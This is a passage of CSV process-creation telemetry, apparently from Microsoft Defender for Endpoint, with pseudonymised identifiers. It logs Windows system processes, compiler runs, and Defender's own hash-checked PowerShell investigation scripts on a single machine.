10:51:01.445543200+00:00,2021-06-23 10:53:10.666822600+00:00,a333dba1-69f1-4ca1-ab39-22d29897c259,computerpii_0a470890c60768167990033d701e7bd881398861,167286,False,10.7740.19041.1052,False,11540474045136908,,11540474045175023,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+414,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:12:56.297730600+00:00,4628,SenseCncProxy.exe,1096,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:12:56.828656100+00:00,2021-06-24 01:15:26.283505600+00:00,b6e37dfa-347a-4996-9ea9-a85c920bd016,computerpii_0a470890c60768167990033d701e7bd881398861,170249,False,10.7740.19041.1052,False,11540474045137006,,11540474045175543,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+415,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:13:02.378587100+00:00,6892,rundll32.exe,"rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:13:02.934849500+00:00,2021-06-24 01:15:26.284486700+00:00,b048991b-dada-4f60-bd79-da4b6431c610,computerpii_0a470890c60768167990033d701e7bd881398861,170262,False,10.7740.19041.1052,False,11540474045136908,,11540474045175544,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+416,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.203883500+00:00,14796,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\pbyn1bar\pbyn1bar.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.564594900+00:00,17024,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '8e0e822750dde56e280efcfa000e4f7430739f87167ef59a6d3df6d6fa3d6216')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_dae68ce859a4308f413368cb6dfd7abdfb8d03c1.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:51.251655900+00:00,2021-06-23 01:15:33.900182500+00:00,23c837e3-1e7d-48f3-897e-dda96fb75411,computerpii_0a470890c60768167990033d701e7bd881398861,156515,False,10.7740.19041.1052,False,11540474045172157,,11540474045172162,2021-06-23 01:13:47.564594900+00:00,17024,2021-06-23 01:13:47.564594900+00:00,powershell.exe,17024,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+417,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.292275300+00:00,9136,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_8e4f7699586acdcbcecd16e7c22ab8818e3b7749.tmp"" ""c:\Windows\Temp\pbyn1bar\FilePII_a77d249df99e76114e8f8a9232a4ffb5d7aaa52c.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:51.203883500+00:00,14796,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\pbyn1bar\pbyn1bar.cmdline""",True,2021-06-23 01:13:47.564594900+00:00,17024,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:51.301209500+00:00,2021-06-23 01:15:33.900222+00:00,ba6626a7-fbc9-44b6-90ed-d97912a0775e,computerpii_0a470890c60768167990033d701e7bd881398861,156516,False,10.7740.19041.1052,False,11540474045172162,,11540474045172163,2021-06-23 01:13:51.203883500+00:00,14796,2021-06-23 01:13:51.203883500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,14796,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+418,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.675021400+00:00,17864,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\upzdnrgy\upzdnrgy.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:51.687120+00:00,2021-06-23 01:15:33.901353400+00:00,577a35d3-81c2-4528-9b15-eba6f37b1636,computerpii_0a470890c60768167990033d701e7bd881398861,156545,False,10.7740.19041.1052,False,11540474045172155,,11540474045172164,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,powershell.exe,17592,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+419,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.742233900+00:00,13764,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_fd2aedab35d7bc0d97877568eacd49dc9fa8fe40.tmp"" ""c:\Windows\Temp\upzdnrgy\FilePII_5681e243fd9969bfb455e7e7afb2708a55facdbd.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:51.675021400+00:00,17864,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\upzdnrgy\upzdnrgy.cmdline""",True,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:51.746160600+00:00,2021-06-23 01:15:33.902045+00:00,714ec604-29e9-49fd-a854-fd403f1a3311,computerpii_0a470890c60768167990033d701e7bd881398861,156563,False,10.7740.19041.1052,False,11540474045172164,,11540474045172165,2021-06-23 01:13:51.675021400+00:00,17864,2021-06-23 01:13:51.675021400+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,17864,128,ActiveProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.677677900+00:00,2019-12-07 09:10:35.992536100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+420,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.860419100+00:00,16752,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\ipei4faw\ipei4faw.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:47.559938600+00:00,17592,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '900f80d1797f704215f1b63ee986972240e47cc081428073b4e11a2046d0cd7d')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_6eb1f04356edd651868478d7041a8b641a8b29a2.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:51.876855700+00:00,2021-06-23 01:15:33.903817300+00:00,862aeef1-edf3-4946-90af-138a1ab01b14,computerpii_0a470890c60768167990033d701e7bd881398861,156615,False,10.7740.19041.1052,False,11540474045172155,,11540474045172166,2021-06-23 01:13:47.559938600+00:00,17592,2021-06-23 01:13:47.559938600+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,17592,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+421,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.978519300+00:00,15976,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\TEMP\FilePII_bf8285912038574415b28a53f0e80e6b438f7bf6.tmp"" ""c:\Windows\Temp\ipei4faw\FilePII_63ede3a4c551ca266187994f16fddf219670c4e6.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:51.860419100+00:00,16752,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\TEMP\ipei4faw\ipei4faw.cmdline""",True,2021-06-23 01:13:47.559938600+00:00,17592,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:52.158003+00:00,2021-06-23 01:15:33.907371400+00:00,91dd5329-cdfa-4efd-b99f-cb4195132dfa,computerpii_0a470890c60768167990033d701e7bd881398861,156718,False,10.7740.19041.1052,False,11540474045172166,,11540474045172169,2021-06-23 01:13:51.860419100+00:00,16752,2021-06-23 01:13:51.860419100+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,16752,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 01:13:51.205808900+00:00,2019-12-07 09:10:35.992536100+00:00,2176,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,0.0,257.0,0.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+422,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.968475900+00:00,19252,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ixphds5k.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:47.559915900+00:00,12400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1fa227bd0867edfce90eb510f261e723918795c6adcc290e0731f442391b58c3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:52.158227500+00:00,2021-06-23 01:15:33.907405100+00:00,d6058f46-5291-4525-9085-b1d0d9d0f512,computerpii_0a470890c60768167990033d701e7bd881398861,156719,False,10.7740.19041.1052,False,11540474045172154,,11540474045172168,2021-06-23 01:13:47.559915900+00:00,12400,2021-06-23 01:13:47.559915900+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,12400,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 00:54:07.191907300+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+423,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:51.963245800+00:00,10208,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\ed0rqzvo.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 01:13:47.559946800+00:00,8684,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '44fb24c92002261b2aae76fa1b456afdd6187d4c86b8ad3342e71e3da398bd36')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_a32b019b4546ad90fb5c415f06d740c2d038e1ea.ps1' }""",True,2021-06-23 01:13:37.445122500+00:00,7128,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:52.159985800+00:00,2021-06-23 